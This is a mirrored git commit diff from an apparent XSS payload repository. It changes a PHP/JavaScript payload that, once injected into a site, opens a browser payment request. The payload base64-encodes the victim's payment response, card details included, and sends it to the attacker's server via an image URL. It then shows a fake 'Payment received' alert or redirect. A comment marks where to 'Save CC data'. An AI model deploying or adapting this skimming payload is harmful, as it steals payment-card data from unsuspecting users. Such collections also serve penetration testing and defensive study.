mirror of
https://github.com/nettitude/xss_payloads.git
synced 2024-11-24 21:23:08 +00:00
Made confirmation message work on image load
This commit is contained in:
parent
329e5f48c1
commit
b2ab0d0f54
1 changed files with 69 additions and 50 deletions
|
@ -7,6 +7,7 @@
|
|||
* - value - cash value of purchase (default: "10")
|
||||
* - confirmation - URL of the payment confirmation page to forward to after receiving details
|
||||
*/
|
||||
if(empty($_GET["data"])){
|
||||
header( "Content-type: text/javascript" );
|
||||
|
||||
$url = 'http';
|
||||
|
@ -39,7 +40,12 @@
|
|||
$value = "10";
|
||||
}
|
||||
|
||||
if(empty($_GET["data"])){
|
||||
if( !empty( $_GET["confirmation"] ) ){
|
||||
$confirmation = $_GET["confirmation"];
|
||||
}else{
|
||||
$confirmation = null;
|
||||
}
|
||||
|
||||
?>
|
||||
if(window.PaymentRequest) {
|
||||
|
||||
|
@ -64,27 +70,40 @@ if(window.PaymentRequest) {
|
|||
|
||||
const request = new PaymentRequest( supportedPaymentMethods, paymentDetails, options );
|
||||
|
||||
request.show()
|
||||
promise = request.show()
|
||||
.then((paymentResponse) => {
|
||||
|
||||
return paymentResponse.complete()
|
||||
.then(() => {;
|
||||
// Send payment response back to this URL
|
||||
console.log(paymentResponse);
|
||||
url = '<?=$url?>?data=' + btoa(JSON.stringify(paymentResponse));
|
||||
console.log(url);
|
||||
new Image().src = url;
|
||||
return paymentResponse.complete();
|
||||
i= new Image();
|
||||
i.addEventListener('load', function(){
|
||||
<?php if($confirmation){ ?>
|
||||
window.location = '<?=$confirmation?>';
|
||||
<?php }else{ ?>
|
||||
alert("Payment received, thank you")
|
||||
<?php } ?>
|
||||
},false);
|
||||
i.src = url;
|
||||
});
|
||||
|
||||
}).catch((err) => {
|
||||
console.log("Payment request failed");
|
||||
});
|
||||
<?php
|
||||
if( !empty($_GET["confirmation"]) ){
|
||||
?>
|
||||
window.location = "<?=$_GET["confirmation"]?>";
|
||||
<?php } ?>
|
||||
} else {
|
||||
// Fallback to traditional checkout
|
||||
console.log("PaymentRequest API not supported in this browser");
|
||||
}
|
||||
<?php
|
||||
}else{
|
||||
|
||||
// Output a blank gif
|
||||
header( "Content-type: image/gif" );
|
||||
header( "Cache-control: no-cache, no-store, max-age=0, private" );
|
||||
header( "Pragma: no-cache" );
|
||||
echo base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7");
|
||||
|
||||
// Save CC data here if required
|
||||
|
||||
}
|
||||
?>
|
||||
|
|
Loading…
Reference in a new issue